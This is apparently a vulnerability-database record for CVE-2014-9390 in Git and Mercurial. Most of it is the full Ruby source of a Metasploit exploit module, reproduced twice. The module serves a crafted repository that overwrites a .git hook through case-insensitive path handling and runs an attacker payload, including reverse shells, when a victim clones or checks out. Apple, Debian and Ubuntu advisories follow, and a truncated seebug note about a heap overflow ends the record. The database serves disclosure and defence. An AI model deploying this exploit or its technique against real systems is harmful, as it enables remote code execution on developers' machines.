There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc.\n #\n # This vulnerability allows a specially crafted file to bypass Git's\n # blacklist and overwrite the sensitive .git/hooks/ files which can allow\n # arbitrary code execution if a vulnerable Git client can be convinced to\n # interact with a malicious Git repository.\n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' 
+ variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. 
Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, 
@repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? 
If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_client_command_exec.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:45", "description": "", "published": "2015-01-02T00:00:00", "type": "packetstorm", "title": "Malicious Git And Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2015-01-02T00:00:00", "id": "PACKETSTORM:129784", "href": "https://packetstormsecurity.com/files/129784/Malicious-Git-And-Mercurial-HTTP-Server-For-CVE-2014-9390.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper(update_info( \ninfo, \n'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', \n'Description' => %q( \nThis 
module exploits CVE-2014-9390, which affects Git (versions less \nthan 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions \nless than 3.2.3) and describes three vulnerabilities. \n \nOn operating systems which have case-insensitive file systems, like \nWindows and OS X, Git clients can be convinced to retrieve and \noverwrite sensitive configuration files in the .git \ndirectory which can allow arbitrary code execution if a vulnerable \nclient can be convinced to perform certain actions (for example, \na checkout) against a malicious Git repository. \n \nA second vulnerability with similar characteristics also exists in both \nGit and Mercurial clients, on HFS+ file systems (Mac OS X) only, where \ncertain Unicode codepoints are ignorable. \n \nThe third vulnerability with similar characteristics only affects \nMercurial clients on Windows, where Windows \"short names\" \n(MS-DOS-compatible 8.3 format) are supported. \n \nToday this module only truly supports the first vulnerability (Git \nclients on case-insensitive file systems) but has the functionality to \nsupport the remaining two with a little work. 
\n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module \n], \n'References' => \n[ \n['CVE', '2014-9390'], \n['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'], \n['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'], \n['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'], \n['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'], \n['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'], \n['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'], \n['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'], \n['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a'] \n \n], \n'DisclosureDate' => 'Dec 18 2014', \n'Targets' => \n[ \n[ \n'Automatic', \n{ \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic bash-tcp perl bash' \n} \n} \n} \n], \n[ \n'Windows Powershell', \n{ \n'Platform' => [ 'windows' ], \n'Arch' => [ARCH_X86, ARCH_X86_64] \n} \n] \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('GIT', [true, 'Exploit Git clients', true]) \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), \nOptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']), \nOptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), \nOptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']), \nOptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false]) \n] \n) \nend \n \ndef setup \n# the exploit requires that we act 
enough like a real Mercurial HTTP instance, \n# so we keep a mapping of all of the files and the corresponding data we'll \n# send back along with a trigger file that signifies that the git/mercurial \n# client has fetched the malicious content. \n@repo_data = { \ngit: { files: {}, trigger: nil }, \nmercurial: { files: {}, trigger: nil } \n} \n \nunless datastore['GIT'] || datastore['MERCURIAL'] \nfail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL') \nend \n \nsetup_git \nsetup_mercurial \n \nsuper \nend \n \ndef setup_git \nreturn unless datastore['GIT'] \n# URI must start with a / \nunless git_uri && git_uri =~ /^\\// \nfail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') \nend \n# sanity check the malicious hook: \nif datastore['GIT_HOOK'].blank? \nfail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') \nend \n \n# In .git/hooks/ directory, specially named files are shell scripts that \n# are executed when particular events occur. For example, if \n# .git/hooks/post-checkout was an executable shell script, a git client \n# would execute that file every time anything is checked out. There are \n# various other files that can be used to achieve similar goals but related \n# to committing, updating, etc. \n# \n# This vulnerability allows a specially crafted file to bypass Git's \n# blacklist and overwrite the sensitive .git/hooks/ files which can allow \n# arbitrary code execution if a vulnerable Git client can be convinced to \n# interact with a malicious Git repository. 
\n# \n# This builds a fake git repository using the knowledge from: \n# \n# http://schacon.github.io/gitbook/7_how_git_stores_objects.html \n# http://schacon.github.io/gitbook/7_browsing_git_objects.html \ncase target.name \nwhen 'Automatic' \nfull_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\" \nwhen 'Windows Powershell' \npsh = cmd_psh_payload(payload.encoded, \npayload_instance.arch.first, \nremove_comspec: true, \nencode_final_payload: true) \nfull_cmd = \"#!/bin/sh\\n#{psh}\" \nend \n \nsha1, content = build_object('blob', full_cmd) \ntrigger = \"/objects/#{get_path(sha1)}\" \n@repo_data[:git][:trigger] = trigger \n@repo_data[:git][:files][trigger] = content \n# build tree that points to the blob \nsha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build a tree that points to the hooks directory in which the hook lives, called hooks \nsha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build a tree that points to the partially uppercased .git directory in \n# which hooks live \nvariants = [] \n%w(g G). each do |g| \n%w(i I).each do |i| \n%w(t T).each do |t| \ngit = g + i + t \nvariants << git unless git.chars.none? { |c| c == c.upcase } \nend \nend \nend \ngit_dir = '.' 
+ variants.sample \nsha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build the supposed commit that dropped this file, which has a random user/company \nemail = Rex::Text.rand_mail_address \nfirst, last, company = email.scan(/([^\\.]+)\\.([^\\.]+)@(.*)$/).flatten \nfull_name = \"#{first.capitalize} #{last.capitalize}\" \ntstamp = Time.now.to_i \nauthor_time = rand(tstamp) \ncommit_time = rand(author_time) \ntz_off = rand(10) \ncommit = \"author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\\n\" \\ \n\"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\\n\" \\ \n\"\\n\" \\ \n\"Initial commit to open git repository for #{company}!\\n\" \nif datastore['VERBOSE'] \nvprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\") \ncommit.each_line { |l| vprint_status(l.strip) } \nend \nsha1, content = build_object('commit', \"tree #{sha1}\\n#{commit}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n# build HEAD \n@repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\" \n# lastly, build refs \n@repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\" \nend \n \ndef setup_mercurial \nreturn unless datastore['MERCURIAL'] \n# URI must start with a / \nunless mercurial_uri && mercurial_uri =~ /^\\// \nfail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') \nend \n# sanity check the malicious hook \nif datastore['MERCURIAL_HOOK'].blank? \nfail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') \nend \n# we fake the Mercurial HTTP protocol such that we are compliant as possible but \n# also as simple as possible so that we don't have to support all of the protocol \n# complexities. 
Taken from: \n# http://mercurial.selenic.com/wiki/HttpCommandProtocol \n# http://selenic.com/hg/file/tip/mercurial/wireproto.py \n@repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' \nfake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' \n@repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\" \n# TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat \n@repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\") \n \n# TODO: finish building the fake repository \nend \n \n# Build's a Git object \ndef build_object(type, content) \n# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html \nheader = \"#{type} #{content.size}\\0\" \nstore = header + content \n[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] \nend \n \n# Returns the Git object path name that a file with the provided SHA1 will reside in \ndef get_path(sha1) \nsha1[0...2] + '/' + sha1[2..40] \nend \n \ndef exploit \nsuper \nend \n \ndef primer \n# add the git and mercurial URIs as necessary \nif datastore['GIT'] \nhardcoded_uripath(git_uri) \nprint_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\") \nend \nif datastore['MERCURIAL'] \nhardcoded_uripath(mercurial_uri) \nprint_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\") \nend \nend \n \n# handles routing any request to the mock git, mercurial or simple HTML as necessary \ndef on_request_uri(cli, req) \n# if the URI is one of our repositories and the user-agent is that of git/mercurial \n# send back the appropriate data, otherwise just show the HTML version \nif (user_agent = req.headers['User-Agent']) \nif datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri) \ndo_git(cli, req) \nreturn \nelsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri) 
\ndo_mercurial(cli, req) \nreturn \nend \nend \n \ndo_html(cli, req) \nend \n \n# simulates a Git HTTP server \ndef do_git(cli, req) \n# determine if the requested file is something we know how to serve from our \n# fake repository and send it if so \nreq_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') \nif @repo_data[:git][:files].key?(req_file) \nvprint_status(\"Sending Git #{req_file}\") \nsend_response(cli, @repo_data[:git][:files][req_file]) \nif req_file == @repo_data[:git][:trigger] \nvprint_status(\"Trigger!\") \n# Do we need this? If so, how can I update the payload which is in a file which \n# has already been built? \n# regenerate_payload \nhandler(cli) \nend \nelse \nvprint_status(\"Git #{req_file} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# simulates an HTTP server with simple HTML content that lists the fake \n# repositories available for cloning \ndef do_html(cli, _req) \nresp = create_response \nresp.body = <<HTML \n<html> \n<head><title>Public Repositories</title></head> \n<body> \n<p>Here are our public repositories:</p> \n<ul> \nHTML \n \nif datastore['GIT'] \nthis_git_uri = URI.parse(get_uri).merge(git_uri) \nresp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\" \nelse \nresp.body << \"<li><a>Git</a> (currently offline)</li>\" \nend \n \nif datastore['MERCURIAL'] \nthis_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri) \nresp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\" \nelse \nresp.body << \"<li><a>Mercurial</a> (currently offline)</li>\" \nend \nresp.body << <<HTML \n</ul> \n</body> \n</html> \nHTML \n \ncli.send_response(resp) \nend \n \n# simulates a Mercurial HTTP server \ndef do_mercurial(cli, req) \n# determine if the requested file is something we know how to serve from our \n# fake repository and send it if so \nuri = URI.parse(req.uri) \nreq_path = uri.path \nreq_path += \"?#{uri.query}\" if uri.query 
\nreq_path.gsub!(/^#{mercurial_uri}/, '') \nif @repo_data[:mercurial][:files].key?(req_path) \nvprint_status(\"Sending Mercurial #{req_path}\") \nsend_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') \nif req_path == @repo_data[:mercurial][:trigger] \nvprint_status(\"Trigger!\") \n# Do we need this? If so, how can I update the payload which is in a file which \n# has already been built? \n# regenerate_payload \nhandler(cli) \nend \nelse \nvprint_status(\"Mercurial #{req_path} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI \ndef git_uri \nreturn @git_uri if @git_uri \nif datastore['GIT_URI'].blank? \n@git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' \nelse \n@git_uri = datastore['GIT_URI'] \nend \nend \n \n# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI \ndef mercurial_uri \nreturn @mercurial_uri if @mercurial_uri \nif datastore['MERCURIAL_URI'].blank? \n@mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase \nelse \n@mercurial_uri = datastore['MERCURIAL_URI'] \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/129784/git_client_command_exec.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-9390"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-12-18-1 Xcode 6.2 beta 3\r\n\r\nXcode 6.2 beta 3 is now available and addresses the following:\r\n\r\nGit\r\nAvailable for: OS X Mavericks v10.9.4 or later\r\nImpact: Synching with a malicious git repository may allow\r\nunexpected files to be added to the .git folder\r\nDescription: The checks involved in disallowed paths did not account\r\nfor case insensitivity or unicode characters. 
This issue was\r\naddressed by adding additional checks.\r\nCVE-ID\r\nCVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of\r\nMercurial\r\n\r\nXcode 6.2 beta 3 may be obtained from:\r\nhttps://developer.apple.com/xcode/downloads/\r\n\r\nTo check that the Xcode has been updated:\r\n\r\n* Select Xcode in the menu bar\r\n* Select About Xcode\r\n* The version after applying this update will be "6.2 (6C101)".\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJUk1PKAAoJEBcWfLTuOo7t268P/2z353ePUi8rj8332xbzgYsz\r\nJc4kMXnGe1jM2Gx12RuT/v/QIIjfguCSzExXimQriFTIbnkFz8rYDPqSFI0fM2T9\r\n8dbtpED3VnsvGQmAUVCfd9GvtqDvx6ZPW2AKih6ly7XtGtqBZLxssGbZFvXNU4X3\r\nfDbmF0jm8nLQoAcpFvarERmhQQOeMDw2Grf3ynPpMxe2iznAkAR8Asves8sUFh36\r\nALdDyQtW2WhWSUhHN8o31VTD2DgV57VwJ2rL6F9UMHmOu7x5SBAATLaNRD1fQOrR\r\naMmFypeUQR1/6CyTT8E9ReUy5iG4X+Sy52LPB7sovPTLIweaOW1Ru12XEbjhBzR6\r\nZNUMcujQEAWwzaHPBIzDKCcG74QY/JpZzrnwvgvgVZ+nrM2tDtSUbfHmGJGzLDNw\r\nxmE+fn1Ik1p1pSShOUO1/2uU9fM9x/P86Kyp07QG7sOZoJN6Wbn+CM/TGwpLBRRs\r\n4Rj+NxlNph5IWzfLIJqCTu4v8hpM/jIMYjQG69BewXOisZVKw1FVHWIzbxHVIApH\r\nn+Kk4Wc2qhLaLLiPzMaDrwe4i5in8ImDhTUW0WH6Un7xuojvRFvTWLchc/Z7QJ6l\r\n+ExN2msjPf73iHY4c9E4eWNOeIyzrpyyHqrxswnlp844fpDHF9Qc8jVScywMtcc0\r\nqOvKkbiVCkNdEtNdAq0d\r\n=Umq9\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:DOC:31505", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31505", "title": "APPLE-SA-2014-12-18-1 Xcode 6.2 beta 3", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": 
"software", "cvelist": ["CVE-2014-9390"], "description": "Invalid processing of character case in special file names.", "edition": 1, "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:VULN:14154", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14154", "title": "Apple Xcode git client unauthorized files access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3257-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMay 11, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mercurial\r\nCVE ID : CVE-2014-9462\r\nDebian Bug : 783237\r\n\r\nJesse Hertz of Matasano Security discovered that Mercurial, a\r\ndistributed version control system, is prone to a command injection\r\nvulnerability via a crafted repository name in a clone command.\r\n\r\nFor the oldstable distribution (wheezy), this problem has been fixed in\r\nversion 2.2.2-4+deb7u1. 
This update also includes a fix for\r\nCVE-2014-9390 previously scheduled for the next wheezy point release.\r\n\r\nFor the stable distribution (jessie), this problem has been fixed in\r\nversion 3.1.2-2+deb8u1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 3.4-1.\r\n\r\nWe recommend that you upgrade your mercurial packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJVUQtdAAoJEAVMuPMTQ89EQDcP/2qNgRl1fhhTTuzQUpTSutuF\r\n8tauTnYT3xuu3PB6aXDWEqFTmmKxUQQiOyVxTWeqeF7jWs7Wu0naTBrs+tKvC4b2\r\nlxy8AC5asTNmPdxUeJMqsUonHvkFEBqGQnomhOwb/qB2oEMgO3vGCrrEs7IFGZ9r\r\nZ+yi91ZbnzMXrH1t2cAGYRmilhquhLg0OEp4hjFhiEZor9GS+Ejdb+g2r/Ug5YFx\r\nbQUsMwJ8ww5r8WjFkTybwAT9iORR2uD6QyyzT11w/F9nXmCZEcurCN+xJKtkyTLW\r\n7ImSrFuhcUbCYSSf9JYiY69SeojBXFkGD8maxjZG8avqzEiKqmxIODUVEn4qO5HD\r\nbSBS/aG6oHD9Sw4pGAtrR2WlOucPf4UOnBxB2ztYrLgMrSE9uMBdceMK8ts2hIrP\r\ne8AojdicvaJZ2q0BBWCo8BSsWpwwN4bgDnWj3d6r63cWWQM/6b6ZSA2NlQsAs0V1\r\noIVCpiUWZImc8I6GKpp3cQM69ECIIgH2+tr7gimsUlTzObP3heGqEqjrA60KAAdl\r\npe6vZClklSyhF1lOqW/p2SSLDcNWZ/ht/0bP223an1yXzwbVi8t/qRXGfggHi+cr\r\nQXEhw2LSRBhQ+894iznWPXHmBdYqKu+hC/yMD+D0B5W64PSRtDxjfMoJi562pNWZ\r\nzifFdMx9P3uOVEHG+d+V\r\n=jXXY\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32120", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32120", "title": "[SECURITY] [DSA 3257-1] mercurial security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "Matt 
Mackall and Augie Fackler discovered that Git incorrectly handled certain \nfilesystem paths. A remote attacker could possibly use this issue to execute \narbitrary code if the Git tree is stored in an HFS+ or NTFS filesystem. The \nremote attacker would need write access to a Git repository that the victim \npulls from.", "edition": 4, "modified": "2015-01-14T00:00:00", "published": "2015-01-14T00:00:00", "href": "https://ubuntu.com/security/notices/USN-2470-1", "id": "USN-2470-1", "type": "ubuntu", "title": "Git vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:14:42", "description": "\u53c2\u8003\u6765\u6e90\uff1a http://seclists.org/oss-sec/2016/q1/645\r\n\r\nHello, original report describing the overflow is here http://pastebin.com/UX2P2jjg\r\n\r\n\r\n>On 11/02/2016 16:50, Jeff King wrote this on the git security mailing list:\r\n\r\n>>On Thu, Feb 11, 2016 at 02:31:49PM +0100, 'La\u00ebl Cellier' via Git Security wrote:\r\nOk the bug works by pushing or cloning a repository with a large\r\nfilename or a large number of nested trees.\r\n[...]\r\nThe point is affected versions are still shipped as part of many\r\ndistributions as part of their stable branch, so I think it\u2019s\r\nimportant to get a \u1d04\u1d20\u1d07 for public awareness.\r\n\r\n>Yes, I do think versions below v2.7.0 have a heap overflow, as you\r\nmentioned. 
